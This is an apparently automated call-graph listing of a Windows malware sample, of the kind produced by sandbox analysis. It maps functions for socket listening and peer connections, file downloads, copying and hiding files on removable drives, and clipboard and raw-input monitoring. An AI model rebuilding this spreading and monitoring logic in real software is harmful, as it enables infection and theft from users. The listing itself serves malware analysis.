5308 40b92c 5305->5308 5344 40b3d0 inet_ntoa 5306->5344 5311 40b9c6 5307->5311 5342 40b3d0 inet_ntoa 5308->5342 5318 40b9f1 5311->5318 5346 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 5311->5346 5312 40b93a strstr 5312->5285 5312->5299 5313 40b97b strstr 5313->5285 5314 40b98b 5313->5314 5345 40b3d0 inet_ntoa 5314->5345 5317 40baea LeaveCriticalSection 5317->5285 5318->5317 5320 40a740 7 API calls 5318->5320 5319 40b999 strstr 5319->5285 5319->5307 5321 40ba35 5320->5321 5321->5317 5347 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 5321->5347 5323 40ba53 5324 40ba80 5323->5324 5325 40ba76 Sleep 5323->5325 5327 40baa5 5323->5327 5326 40ab60 _invalid_parameter 3 API calls 5324->5326 5325->5323 5326->5327 5327->5317 5348 40b530 5327->5348 5329->4605 5331 40b530 13 API calls 5330->5331 5332 40b523 LeaveCriticalSection 5331->5332 5332->4599 5334 40b7a7 gethostbyname 5333->5334 5335 40b7c3 5333->5335 5334->5335 5335->5285 5336 40b3d0 inet_ntoa 5335->5336 5336->5287 5337->5290 5338->5295 5339->5304 5340->5296 5341->5305 5342->5312 5343->5303 5344->5313 5345->5319 5346->5318 5347->5323 5349 40b544 5348->5349 5350 40b53f 5348->5350 5351 40a950 _invalid_parameter 7 API calls 5349->5351 5350->5317 5353 40b558 5351->5353 5352 40b5b4 CreateFileW 5354 40b603 InterlockedExchange 5352->5354 5355 40b5d7 WriteFile FlushFileBuffers 5352->5355 5353->5350 5353->5352 5356 40ab60 _invalid_parameter 3 API calls 5354->5356 5355->5354 5356->5350 5360 40dcdd 5357->5360 5358 40dc13 5358->4612 5358->4613 5359 40dd01 WaitForSingleObject 5359->5360 5360->5358 5360->5359 5366 407840 5361->5366 5362 407868 Sleep 5362->5366 5363 40791a Sleep 5363->5366 5364 407897 Sleep wsprintfA DeleteUrlCacheEntry 5391 40f4b0 InternetOpenA 5364->5391 5366->5362 5366->5363 5366->5364 5367 40f560 58 API calls 5366->5367 5367->5366 5369 4058c9 memset GetModuleHandleW 5368->5369 5370 405902 Sleep GetTickCount GetTickCount wsprintfW RegisterClassExW 5369->5370 5370->5370 5371 405940 CreateWindowExW 5370->5371 5372 40596b 5371->5372 5373 40596d GetMessageA 5371->5373 5374 40599f ExitThread 5372->5374 5375 405981 TranslateMessage DispatchMessageA 5373->5375 5376 405997 5373->5376 5375->5373 5376->5369 5376->5374 5398 40f1f0 CreateFileW 5377->5398 5379 4070f8 ExitThread 5381 406fa0 5381->5379 5382 4070e8 Sleep 5381->5382 5383 406fd9 5381->5383 5401 4063e0 GetLogicalDrives 5381->5401 5382->5381 5407 406300 5383->5407 5385 407010 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 5388 407086 wsprintfW 5385->5388 5389 40709b wsprintfW 5385->5389 5387 40700b 5388->5389 5413 4068e0 _chkstk 5389->5413 5392 40f4d6 InternetOpenUrlA 5391->5392 5393 40f548 Sleep 5391->5393 5394 40f4f5 HttpQueryInfoA 5392->5394 5395 40f53e InternetCloseHandle 5392->5395 5393->5366 5396 40f534 InternetCloseHandle 5394->5396 5397 40f51e 5394->5397 5395->5393 5396->5395 5397->5396 5399 40f238 5398->5399 5400 40f21f GetFileSize 5398->5400 5399->5381 5400->5399 5406 40640d 5401->5406 5402 406486 5402->5381 5403 40641c RegOpenKeyExW 5404 40643e RegQueryValueExW 5403->5404 5403->5406 5405 40647a RegCloseKey 5404->5405 5404->5406 5405->5406 5406->5402 5406->5403 5406->5405 5408 406359 5407->5408 5409 40631c 5407->5409 5408->5385 5408->5387 5472 406360 GetDriveTypeW 5409->5472 5412 40634b lstrcpyW 5412->5408 5414 4068fe 7 API calls 5413->5414 5443 4068f7 5413->5443 5415 4069d2 5414->5415 5416 406a14 PathFileExistsW 5414->5416 5417 40f1f0 2 API calls 5415->5417 5418 406ac4 5416->5418 5419 406a29 PathFileExistsW 5416->5419 5421 4069de 5417->5421 5420 406af5 PathFileExistsW 5418->5420 5477 4064a0 7 API calls 5418->5477 5422 406a59 PathFileExistsW 5419->5422 5423 406a3a SetFileAttributesW DeleteFileW 5419->5423 5426 406b06 5420->5426 5427 406b47 PathFileExistsW 5420->5427 5421->5416 5425 4069f5 SetFileAttributesW DeleteFileW 5421->5425 5428 406a6a CreateDirectoryW 5422->5428 5429 406a8c PathFileExistsW 5422->5429 5423->5422 5425->5416 5430 40f1f0 2 API calls 5426->5430 5432 406b58 5427->5432 5433 406bca PathFileExistsW 5427->5433 5428->5429 5431 406a7d SetFileAttributesW 5428->5431 5429->5418 5434 406a9d CopyFileW 5429->5434 5438 406b12 5430->5438 5431->5429 5432->5433 5439 406b64 PathFileExistsW 5432->5439 5435 406c75 FindFirstFileW 5433->5435 5436 406bdf PathFileExistsW 5433->5436 5434->5418 5440 406ab5 SetFileAttributesW 5434->5440 5435->5443 5469 406c9c 5435->5469 5441 406bf0 5436->5441 5442 406c2c 5436->5442 5437 406ad4 5437->5420 5444 40f1f0 2 API calls 5437->5444 5438->5427 5445 406b28 SetFileAttributesW DeleteFileW 5438->5445 5439->5433 5446 406b73 CopyFileW 5439->5446 5440->5418 5448 406c12 5441->5448 5449 406bf8 5441->5449 5452 406c34 5442->5452 5453 406c4e 5442->5453 5443->5387 5451 406aed 5444->5451 5445->5427 5446->5433 5447 406b8b SetFileAttributesW PathFileExistsW 5446->5447 5447->5433 5454 406bab SetFileAttributesW DeleteFileW 5447->5454 5458 406660 4 API calls 5448->5458 5488 406660 CoInitialize CoCreateInstance 5449->5488 5450 406d5e lstrcmpW 5457 406d74 lstrcmpW 5450->5457 5450->5469 5451->5420 5459 406660 4 API calls 5452->5459 5455 406660 4 API calls 5453->5455 5454->5433 5460 406c0d SetFileAttributesW 5455->5460 5457->5469 5458->5460 5459->5460 5460->5435 5461 406f35 FindNextFileW 5461->5450 5463 406f51 FindClose 5461->5463 5463->5443 5464 406dba lstrcmpiW 5464->5469 5465 406e21 PathMatchSpecW 5466 406e42 wsprintfW SetFileAttributesW DeleteFileW 5465->5466 5465->5469 5466->5469 5467 406e9f PathFileExistsW 5468 406eb5 wsprintfW wsprintfW 5467->5468 5467->5469 5468->5469 5470 406f1f MoveFileExW 5468->5470 5469->5450 5469->5461 5469->5464 5469->5465 5469->5467 5493 4067a0 CreateDirectoryW wsprintfW FindFirstFileW 5469->5493 5470->5461 5473 406388 5472->5473 5475 40633f 5472->5475 5474 40639c QueryDosDeviceW 5473->5474 5473->5475 5474->5475 5476 4063b6 StrCmpNW 5474->5476 5475->5408 5475->5412 5476->5475 5478 406640 InternetCloseHandle 5477->5478 5479 40653e InternetOpenUrlW 5477->5479 5478->5437 5480 406633 InternetCloseHandle 5479->5480 5481 40656b CreateFileW 5479->5481 5480->5478 5482 406626 5481->5482 5483 406598 InternetReadFile 5481->5483 5482->5480 5484 4065eb wsprintfW DeleteFileW 5483->5484 5485 4065bc 5483->5485 5484->5482 5485->5484 5486 4065c5 WriteFile 5485->5486 5486->5483 5489 406696 5488->5489 5492 4066ee 5488->5492 5490 4066a9 wsprintfW 5489->5490 5491 4066cf wsprintfW 5489->5491 5489->5492 5490->5492 5491->5492 5492->5460 5494 4067f5 lstrcmpW 5493->5494 5495 4068cf 5493->5495 5496 40680b lstrcmpW 5494->5496 5500 406821 5494->5500 5495->5469 5498 406823 wsprintfW wsprintfW 5496->5498 5496->5500 5497 40689c FindNextFileW 5497->5494 5501 4068b8 FindClose RemoveDirectoryW 5497->5501 5499 406886 MoveFileExW 5498->5499 5498->5500 5499->5497 5500->5497 5501->5495 5869 40d980 5875 4021b0 5869->5875 5872 40d9bf 5873 40d9a5 WaitForSingleObject 5879 401600 5873->5879 5876 4021cf 5875->5876 5877 4021bb 5875->5877 5876->5872 5876->5873 5877->5876 5900 402020 5877->5900 5880 401737 5879->5880 5881 40160d 5879->5881 5880->5872 5881->5880 5882 401619 EnterCriticalSection 5881->5882 5883 401630 5882->5883 5884 4016b5 LeaveCriticalSection SetEvent 5882->5884 5883->5884 5887 401641 InterlockedDecrement 5883->5887 5890 40165a InterlockedExchangeAdd 5883->5890 5898 4016a0 InterlockedDecrement 5883->5898 5885 4016d0 5884->5885 5886 4016e8 5884->5886 5888 4016d6 PostQueuedCompletionStatus 5885->5888 5889 40dd50 11 API calls 5886->5889 5887->5883 5888->5886 5888->5888 5891 4016f3 5889->5891 5890->5883 5892 40166d InterlockedIncrement 5890->5892 5893 40de90 6 API calls 5891->5893 5894 401c50 4 API calls 5892->5894 5895 4016fc CloseHandle CloseHandle WSACloseEvent 5893->5895 5894->5883 5921 40b4f0 shutdown closesocket 5895->5921 5897 401724 DeleteCriticalSection 5899 40ab60 _invalid_parameter 3 API calls 5897->5899 5898->5883 5899->5880 5901 40a740 7 API calls 5900->5901 5902 40202b 5901->5902 5903 402038 GetSystemInfo InitializeCriticalSection CreateEventA 5902->5903 5909 4021a5 5902->5909 5904 402076 CreateIoCompletionPort 5903->5904 5905 40219f 5903->5905 5904->5905 5906 40208f 5904->5906 5907 401600 35 API calls 5905->5907 5908 40dbb0 8 API calls 5906->5908 5907->5909 5910 402094 5908->5910 5909->5876 5910->5905 5911 40209f WSASocketA 5910->5911 5911->5905 5912 4020bd setsockopt htons bind 5911->5912 5912->5905 5913 402126 listen 5912->5913 5913->5905 5914 40213a WSACreateEvent 5913->5914 5914->5905 5915 402147 WSAEventSelect 5914->5915 5915->5905 5920 402159 5915->5920 5916 40217f 5917 40dbe0 16 API calls 5916->5917 5919 402194 5917->5919 5918 40dbe0 16 API calls 5918->5920 5919->5876 5920->5916 5920->5918 5921->5897 5934 406085 5936 405ffe 5934->5936 5935 40608a LeaveCriticalSection 5936->5935 5937 40abd0 8 API calls 5936->5937 5938 40605c 5937->5938 5938->5935 5502 406fc6 5505 406fa8 5502->5505 5503 4070e8 Sleep 5503->5505 5504 406fd9 5506 406300 4 API calls 5504->5506 5505->5503 5505->5504 5507 4070f8 ExitThread 5505->5507 5510 4063e0 4 API calls 5505->5510 5508 406fea 5506->5508 5509 407010 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 5508->5509 5511 40700b 5508->5511 5512 407086 wsprintfW 5509->5512 5513 40709b wsprintfW 5509->5513 5510->5505 5512->5513 5514 4068e0 79 API calls 5513->5514 5514->5511 5939 40f908 5940 40f910 5939->5940 5942 40f9c4 5940->5942 5945 40fb45 5940->5945 5944 40f949 5944->5942 5949 40fa30 RtlUnwind 5944->5949 5946 40fb5a 5945->5946 5948 40fb76 5945->5948 5947 40fbe5 NtQueryVirtualMemory 5946->5947 5946->5948 5947->5948 5948->5944 5950 40fa48 5949->5950 5950->5944 5515 40df50 5518 40bf20 5515->5518 5529 40bf31 5518->5529 5521 40ab60 _invalid_parameter 3 API calls 5522 40c2ff 5521->5522 5523 40c310 21 API calls 5523->5529 5525 40b830 31 API calls 5525->5529 5526 40bf4f 5526->5521 5528 40bed0 13 API calls 5528->5529 5529->5523 5529->5525 5529->5526 5529->5528 5532 40c460 5529->5532 5539 40bc00 EnterCriticalSection 5529->5539 5544 407240 5529->5544 5549 4072e0 5529->5549 5554 407110 5529->5554 5561 407210 5529->5561 5533 40c471 lstrlenA 5532->5533 5534 40cb40 7 API calls 5533->5534 5535 40c48f 5534->5535 5535->5533 5537 40c49b 5535->5537 5536 40ab60 _invalid_parameter 3 API calls 5538 40c51f 5536->5538 5537->5536 5537->5538 5538->5529 5540 40bc18 5539->5540 5541 40bc54 LeaveCriticalSection 5540->5541 5564 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 5540->5564 5541->5529 5543 40bc43 5543->5541 5565 407280 5544->5565 5546 407279 5546->5529 5548 40dbe0 16 API calls 5548->5546 5550 407280 75 API calls 5549->5550 5551 4072ff 5550->5551 5552 40732c 5551->5552 5580 407340 5551->5580 5552->5529 5591 405fe0 EnterCriticalSection 5554->5591 5556 40712a 5560 40715d 5556->5560 5596 407170 5556->5596 5559 40ab60 _invalid_parameter 3 API calls 5559->5560 5560->5529 5603 4060a0 EnterCriticalSection 5561->5603 5563 407232 5563->5529 5564->5543 5568 407293 5565->5568 5566 407254 5566->5546 5566->5548 5568->5566 5569 405ef0 EnterCriticalSection 5568->5569 5570 40d1d0 71 API calls 5569->5570 5571 405f0e 5570->5571 5572 405fcb LeaveCriticalSection 5571->5572 5573 405f27 5571->5573 5577 405f48 5571->5577 5572->5568 5574 405f31 memcpy 5573->5574 5575 405f46 5573->5575 5574->5575 5576 40ab60 _invalid_parameter 3 API calls 5575->5576 5578 405fc8 5576->5578 5577->5575 5579 405fa6 memcpy 5577->5579 5578->5572 5579->5575 5583 40be30 5580->5583 5584 40c8b0 3 API calls 5583->5584 5585 40be3b 5584->5585 5586 40be57 lstrlenA 5585->5586 5587 40cb40 7 API calls 5586->5587 5588 40be8d 5587->5588 5589 407385 5588->5589 5590 40ab60 _invalid_parameter 3 API calls 5588->5590 5589->5552 5590->5589 5593 405ffe 5591->5593 5592 40608a LeaveCriticalSection 5592->5556 5593->5592 5594 40abd0 8 API calls 5593->5594 5595 40605c 5594->5595 5595->5592 5597 40a950 _invalid_parameter 7 API calls 5596->5597 5598 407182 memcpy 5597->5598 5599 40be30 13 API calls 5598->5599 5600 4071ec 5599->5600 5601 40ab60 _invalid_parameter 3 API calls 5600->5601 5602 407151 5601->5602 5602->5559 5628 40d230 5603->5628 5606 4062e3 LeaveCriticalSection 5606->5563 5607 40d1d0 71 API calls 5608 4060d9 5607->5608 5608->5606 5609 4061f8 5608->5609 5611 406134 memcpy 5608->5611 5610 406221 5609->5610 5612 405d30 70 API calls 5609->5612 5613 40ab60 _invalid_parameter 3 API calls 5610->5613 5614 40ab60 _invalid_parameter 3 API calls 5611->5614 5612->5610 5615 406242 5613->5615 5616 406158 5614->5616 5615->5606 5617 406251 CreateFileW 5615->5617 5618 40abd0 8 API calls 5616->5618 5617->5606 5619 406274 5617->5619 5620 406168 5618->5620 5623 406291 WriteFile 5619->5623 5624 4062cf FlushFileBuffers 5619->5624 5621 40ab60 _invalid_parameter 3 API calls 5620->5621 5622 40618f 5621->5622 5625 40cb40 7 API calls 5622->5625 5623->5619 5624->5606 5626 4061c5 5625->5626 5627 4076c0 66 API calls 5626->5627 5627->5609 5631 40c780 5628->5631 5632 40c791 5631->5632 5633 40abd0 8 API calls 5632->5633 5634 40c7ab 5632->5634 5635 40c6e0 70 API calls 5632->5635 5638 4084a0 68 API calls 5632->5638 5639 40c7eb memcmp 5632->5639 5633->5632 5636 40ab60 _invalid_parameter 3 API calls 5634->5636 5635->5632 5637 4060c2 5636->5637 5637->5606 5637->5607 5638->5632 5639->5632 5639->5634 5640 401f50 GetQueuedCompletionStatus 5641 402008 5640->5641 5642 401f92 5640->5642 5643 401f97 WSAGetOverlappedResult 5642->5643 5647 401d60 5642->5647 5643->5642 5644 401fb9 WSAGetLastError 5643->5644 5644->5642 5646 401fd3 GetQueuedCompletionStatus 5646->5641 5646->5642 5648 401ef2 InterlockedDecrement setsockopt closesocket 5647->5648 5649 401d74 5647->5649 5650 401e39 5648->5650 5649->5648 5651 401d7c 5649->5651 5650->5646 5667 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 5651->5667 5653 401d81 InterlockedExchange 5654 401d98 5653->5654 5655 401e4e 5653->5655 5654->5650 5658 401da9 InterlockedDecrement 5654->5658 5659 401dbc InterlockedDecrement InterlockedExchangeAdd 5654->5659 5656 401e67 5655->5656 5657 401e57 InterlockedDecrement 5655->5657 5660 401e72 5656->5660 5661 401e87 InterlockedDecrement 5656->5661 5657->5646 5658->5646 5663 401e2f 5659->5663 5676 401ae0 WSASend 5660->5676 5662 401ee9 5661->5662 5662->5646 5668 401cf0 5663->5668 5665 401e7e 5665->5646 5667->5653 5669 401d00 InterlockedExchangeAdd 5668->5669 5670 401cfc 5668->5670 5671 401d53 5669->5671 5672 401d17 InterlockedIncrement 5669->5672 5670->5650 5671->5650 5682 401c50 WSARecv 5672->5682 5674 401d46 5674->5671 5675 401d4c InterlockedDecrement 5674->5675 5675->5671 5677 401b50 5676->5677 5678 401b12 WSAGetLastError 5676->5678 5677->5665 5678->5677 5679 401b1f 5678->5679 5680 401b56 5679->5680 5681 401b26 Sleep WSASend 5679->5681 5680->5665 5681->5677 5681->5678 5683 401cd2 5682->5683 5684 401c8e 5682->5684 5683->5674 5685 401c90 WSAGetLastError 5684->5685 5686 401ca4 Sleep WSARecv 5684->5686 5687 401cdb 5684->5687 5685->5683 5685->5684 5686->5683 5686->5685 5687->5674 5688 40db50 5693 401b60 5688->5693 5690 40db65 5691 40db84 5690->5691 5692 401b60 16 API calls 5690->5692 5692->5691 5694 401b70 5693->5694 5712 401c42 5693->5712 5695 40a740 7 API calls 5694->5695 5694->5712 5696 401b9d 5695->5696 5697 40abd0 8 API calls 5696->5697 5696->5712 5698 401bc9 5697->5698 5699 401be6 5698->5699 5700 401bd6 5698->5700 5701 401ae0 4 API calls 5699->5701 5702 40ab60 _invalid_parameter 3 API calls 5700->5702 5703 401bf3 5701->5703 5704 401bdc 5702->5704 5705 401c33 5703->5705 5706 401bfc EnterCriticalSection 5703->5706 5704->5690 5709 40ab60 _invalid_parameter 3 API calls 5705->5709 5707 401c13 5706->5707 5708 401c1f LeaveCriticalSection 5706->5708 5707->5708 5708->5690 5710 401c3c 5709->5710 5711 40ab60 _invalid_parameter 3 API calls 5710->5711 5711->5712 5712->5690 5713 40bdd0 5714 40bdd3 WaitForSingleObject 5713->5714 5715 40be01 5714->5715 5716 40bdeb InterlockedDecrement 5714->5716 5717 40bdfa 5716->5717 5717->5714 5718 40b510 15 API calls 5717->5718 5718->5717 5719 40dfd0 5729 4013b0 5719->5729 5721 40e05d 5723 40dff7 InterlockedExchangeAdd 5724 40e03b WaitForSingleObject 5723->5724 5725 40dfdd 5723->5725 5724->5725 5726 40e054 5724->5726 5725->5721 5725->5723 5725->5724 5741 40bbb0 EnterCriticalSection 5725->5741 5746 40bed0 5725->5746 5749 401330 5726->5749 5730 40a740 7 API calls 5729->5730 5731 4013bb CreateEventA socket 5730->5731 5732 4013f2 5731->5732 5733 4013f8 5731->5733 5734 401330 7 API calls 5732->5734 5735 401401 bind 5733->5735 5736 401462 5733->5736 5734->5733 5737 401444 CreateThread 5735->5737 5738 401434 5735->5738 5736->5725 5737->5736 5739 401330 7 API calls 5738->5739 5740 40143a 5739->5740 5740->5725 5742 40bbe7 LeaveCriticalSection 5741->5742 5743 40bbcf 5741->5743 5742->5725 5744 40c870 3 API calls 5743->5744 5745 40bbda 5744->5745 5745->5742 5747 40be30 13 API calls 5746->5747 5748 40bf11 5747->5748 5748->5725 5750 401339 5749->5750 5758 40139b 5749->5758 5751 401341 SetEvent WaitForSingleObject 5750->5751 5750->5758 5756 401362 5751->5756 5752 40138b 5759 40b4f0 shutdown closesocket 5752->5759 5754 40ab60 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 5754->5756 5755 401395 5757 40ab60 _invalid_parameter 3 API calls 5755->5757 5756->5752 5756->5754 5757->5758 5758->5721 5759->5755 5760 40d9d0 5761 40da3e 5760->5761 5762 40d9e6 5760->5762 5762->5761 5763 40d9f0 5762->5763 5764 40da43 5762->5764 5765 40da93 5762->5765 5768 40a740 7 API calls 5763->5768 5766 40da68 5764->5766 5767 40da5b InterlockedDecrement 5764->5767 5794 40c570 5765->5794 5770 40ab60 _invalid_parameter 3 API calls 5766->5770 5767->5766 5771 40d9fd 5768->5771 5772 40da74 5770->5772 5783 4023d0 5771->5783 5774 40ab60 _invalid_parameter 3 API calls 5772->5774 5774->5761 5777 40dab9 5777->5761 5780 40daf1 IsBadReadPtr 5777->5780 5782 40bf20 186 API calls 5777->5782 5799 40c670 5777->5799 5779 40da2b InterlockedIncrement 5779->5761 5780->5777 5782->5777 5784 402413 5783->5784 5785 4023d9 5783->5785 5787 40b6f0 5784->5787 5785->5784 5786 4023ea InterlockedIncrement 5785->5786 5786->5784 5788 40b780 2 API calls 5787->5788 5789 40b6ff 5788->5789 5790 40b70d EnterCriticalSection 5789->5790 5791 40b709 5789->5791 5792 40b72c LeaveCriticalSection 5790->5792 5791->5761 5791->5779 5792->5791 5795 40c583 5794->5795 5796 40c5ad memcpy 5794->5796 5797 40a990 9 API calls 5795->5797 5796->5777 5798 40c5a4 5797->5798 5798->5796 5800 40c699 5799->5800 5801 40c68e 5799->5801 5800->5801 5802 40c6b1 memmove 5800->5802 5801->5777 5802->5801 5965 40f910 5966 40f92e 5965->5966 5968 40f9c4 5965->5968 5967 40fb45 NtQueryVirtualMemory 5966->5967 5970 40f949 5967->5970 5969 40fa30 RtlUnwind 5969->5970 5970->5968 5970->5969 5971 40d510 5972 40b6f0 4 API calls 5971->5972 5973 40d523 5972->5973 5974 40d53a 5973->5974 5976 40d550 InterlockedExchangeAdd 5973->5976 5977 40d566 5976->5977 5978 40d56d 5976->5978 5977->5974 5993 40d840 5978->5993 5981 40d58d InterlockedIncrement 5990 40d597 5981->5990 5982 40bed0 13 API calls 5982->5990 5983 40d5c0 6000 40b3d0 inet_ntoa 5983->6000 5985 40d5cc 5986 40d690 InterlockedDecrement 5985->5986 6001 40b4f0 shutdown closesocket 5986->6001 5988 40a950 _invalid_parameter 7 API calls 5988->5990 5989 40d770 6 API calls 5989->5990 5990->5982 5990->5983 5990->5986 5990->5988 5990->5989 5991 40bf20 186 API calls 5990->5991 5992 40ab60 _invalid_parameter 3 API calls 5990->5992 5991->5990 5992->5990 5994 40d84d socket 5993->5994 5995 40d862 htons connect 5994->5995 5996 40d8bf 5994->5996 5995->5996 5997 40d8aa 5995->5997 5996->5994 5998 40d57d 5996->5998 6002 40b4f0 shutdown closesocket 5997->6002 5998->5977 5998->5981 6000->5985 6001->5977 6002->5998 6003 401920 GetTickCount WaitForSingleObject 6004 401ac9 6003->6004 6005 40194d WSAWaitForMultipleEvents 6003->6005 6006 4019f0 GetTickCount 6005->6006 6007 40196a WSAEnumNetworkEvents 6005->6007 6008 401a43 GetTickCount 6006->6008 6009 401a05 EnterCriticalSection 6006->6009 6007->6006 6023 401983 6007->6023 6012 401ab5 WaitForSingleObject 6008->6012 6013 401a4e EnterCriticalSection 6008->6013 6010 401a16 6009->6010 6011 401a3a LeaveCriticalSection 6009->6011 6017 401a29 LeaveCriticalSection 6010->6017 6045 401820 6010->6045 6011->6012 6012->6004 6012->6005 6015 401aa1 LeaveCriticalSection GetTickCount 6013->6015 6016 401a5f InterlockedExchangeAdd 6013->6016 6014 401992 accept 6014->6006 6014->6023 6015->6012 6063 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 6016->6063 6017->6012 6021 401a72 6021->6015 6021->6016 6064 40b4f0 shutdown closesocket 6021->6064 6023->6006 6023->6014 6024 401cf0 7 API calls 6023->6024 6025 4022c0 6023->6025 6024->6006 6026 4022d2 EnterCriticalSection 6025->6026 6027 4022cd 6025->6027 6028 4022e7 6026->6028 6029 4022fd LeaveCriticalSection 6026->6029 6027->6023 6028->6029 6030 402308 6029->6030 6031 40230f 6029->6031 6030->6023 6032 40a740 7 API calls 6031->6032 6033 402319 6032->6033 6034 402326 getpeername CreateIoCompletionPort 6033->6034 6035 4023b8 6033->6035 6037 4023b2 6034->6037 6038 402366 6034->6038 6067 40b4f0 shutdown closesocket 6035->6067 6039 40ab60 _invalid_parameter 3 API calls 6037->6039 6065 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 6038->6065 6039->6035 6040 4023c3 6040->6023 6042 40236b InterlockedExchange InitializeCriticalSection InterlockedIncrement 6066 4021e0 EnterCriticalSection LeaveCriticalSection 6042->6066 6044 4023ab 6044->6023 6046 40190f 6045->6046 6047 401830 6045->6047 6046->6011 6047->6046 6048 40183d InterlockedExchangeAdd 6047->6048 6048->6046 6054 401854 6048->6054 6049 401880 6050 401891 6049->6050 6077 40b4f0 shutdown closesocket 6049->6077 6052 4018a7 InterlockedDecrement 6050->6052 6055 401901 6050->6055 6052->6055 6054->6046 6054->6049 6068 4017a0 EnterCriticalSection 6054->6068 6056 402247 6055->6056 6057 402265 EnterCriticalSection 6055->6057 6056->6011 6058 40229c LeaveCriticalSection DeleteCriticalSection 6057->6058 6061 40227d 6057->6061 6059 40ab60 _invalid_parameter 3 API calls 6058->6059 6059->6056 6060 40ab60 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 6060->6061 6061->6060 6062 40229b 6061->6062 6062->6058 6063->6021 6064->6021 6065->6042 6066->6044 6067->6040 6069 401807 LeaveCriticalSection 6068->6069 6070 4017ba InterlockedExchangeAdd 6068->6070 6069->6054 6071 4017ca LeaveCriticalSection 6070->6071 6072 4017d9 6070->6072 6071->6054 6073 40ab60 _invalid_parameter 3 API calls 6072->6073 6074 4017fe 6073->6074 6075 40ab60 _invalid_parameter 3 API calls 6074->6075 6076 401804 6075->6076 6076->6069 6077->6050 6078 40dfa0 6081 401200 6078->6081 6080 40dfc2 6082 40121d 6081->6082 6096 401314 6081->6096 6083 40a950 _invalid_parameter 7 API calls 6082->6083 6082->6096 6084 401247 memcpy htons 6083->6084 6085 4012ed 6084->6085 6086 401297 sendto 6084->6086 6089 40ab60 _invalid_parameter 3 API calls 6085->6089 6087 4012b6 InterlockedExchangeAdd 6086->6087 6088 4012e9 6086->6088 6087->6086 6090 4012cc 6087->6090 6088->6085 6091 40130a 6088->6091 6092 4012fc 6089->6092 6093 40ab60 _invalid_parameter 3 API calls 6090->6093 6094 40ab60 _invalid_parameter 3 API calls 6091->6094 6092->6080 6095 4012db 6093->6095 6094->6096 6095->6080 6096->6080 6097 40eba1 6098 40ebaa 6097->6098 6099 40ec9d 6098->6099 6100 40ec13 lstrcmpiW 6098->6100 6101 40ec93 SysFreeString 6100->6101 6102 40ec26 6100->6102 6101->6099 6103 40e990 2 API calls 6102->6103 6105 40ec34 6103->6105 6104 40ec85 6104->6101 6105->6101 6105->6104 6106 40ec63 lstrcmpiW 6105->6106 6107 40ec75 6106->6107 6108 40ec7b SysFreeString 6106->6108 6107->6108 6108->6104 5803 406de4 5805 406d8a 5803->5805 5804 406dba lstrcmpiW 5804->5805 5805->5804 5806 406f35 FindNextFileW 5805->5806 5809 406e21 PathMatchSpecW 5805->5809 5812 406e9f PathFileExistsW 5805->5812 5816 4067a0 11 API calls 5805->5816 5807 406f51 FindClose 5806->5807 5808 406d5e lstrcmpW 5806->5808 5813 406f5e 5807->5813 5808->5805 5811 406d74 lstrcmpW 5808->5811 5809->5805 5810 406e42 wsprintfW SetFileAttributesW DeleteFileW 5809->5810 5810->5805 5811->5805 5812->5805 5814 406eb5 wsprintfW wsprintfW 5812->5814 5814->5805 5815 406f1f MoveFileExW 5814->5815 5815->5806 5816->5805 6109 40792a ExitThread 5817 40e070 5823 401470 5817->5823 5819 40e084 5820 40e0af 5819->5820 5821 40e095 WaitForSingleObject 5819->5821 5822 401330 7 API calls 5821->5822 5822->5820 5824 401483 5823->5824 5825 401572 5823->5825 5824->5825 5826 40a740 7 API calls 5824->5826 5825->5819 5827 401498 CreateEventA socket 5826->5827 5828 4014cf 5827->5828 5833 4014d5 5827->5833 5830 401330 7 API calls 5828->5830 5829 4014e2 htons setsockopt bind 5831 401546 5829->5831 5832 401558 CreateThread 5829->5832 5830->5833 5834 401330 7 API calls 5831->5834 5832->5825 5836 401100 5832->5836 5833->5825 5833->5829 5835 40154c 5834->5835 5835->5819 5837 401115 ioctlsocket 5836->5837 5838 4011e4 5837->5838 5840 40113a 5837->5840 5839 40ab60 _invalid_parameter 3 API calls 5838->5839 5842 4011ea 5839->5842 5841 4011cd WaitForSingleObject 5840->5841 5843 40a990 9 API calls 5840->5843 5844 401168 recvfrom 5840->5844 5845 4011ad InterlockedExchangeAdd 5840->5845 5841->5837 5841->5838 5843->5840 5844->5840 5844->5841 5847 401000 5845->5847 5849 401014 5847->5849 5848 40103b 5858 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 5848->5858 5849->5848 5850 40a740 7 API calls 5849->5850 5850->5848 5852 40105b 5859 401580 5852->5859 5854 4010ec 5854->5840 5855 4010a3 IsBadReadPtr 5856 401071 5855->5856 5856->5854 5856->5855 5857 4010d8 memmove 5856->5857 5857->5856 5858->5852 5860 401592 5859->5860 5861 4015a5 memcpy 5859->5861 5862 40a990 9 API calls 5860->5862 5864 4015c1 5861->5864 5863 40159f 5862->5863 5863->5861 5864->5856 6110 40d6b0 6115 40d710 6110->6115 6113 40d6de 6114 40d710 send 6114->6113 6116 40d721 send 6115->6116 6117 40d6c3 6116->6117 6118 40d73e 6116->6118 6117->6113 6117->6114 6118->6116 6118->6117 6119 40d930 6124 40d934 6119->6124 6120 40bbb0 5 API calls 6120->6124 6121 40d950 WaitForSingleObject 6123 40d975 6121->6123 6121->6124 6122 40d550 200 API calls 6122->6124 6124->6120 6124->6121 6124->6122 6124->6123 6125 4059b0 GetWindowLongW 6126 4059d4 6125->6126 6127 4059f6 6125->6127 6128 4059e1 6126->6128 6129 405a67 IsClipboardFormatAvailable 6126->6129 6131 405a46 6127->6131 6132 405a2e SetWindowLongW 6127->6132 6143 4059f1 6127->6143 6135 405a04 SetClipboardViewer SetWindowLongW 6128->6135 6136 4059e7 6128->6136 6133 405a83 IsClipboardFormatAvailable 6129->6133 6134 405a7a 6129->6134 6130 405be4 DefWindowProcA 6137 405a4c SendMessageA 6131->6137 6131->6143 6132->6143 6133->6134 6138 405a98 IsClipboardFormatAvailable 6133->6138 6140 405ab5 OpenClipboard 6134->6140 6141 405b7c 6134->6141 6135->6130 6139 405b9d RegisterRawInputDevices ChangeClipboardChain 6136->6139 6136->6143 6137->6143 6138->6134 6139->6130 6140->6141 6144 405ac5 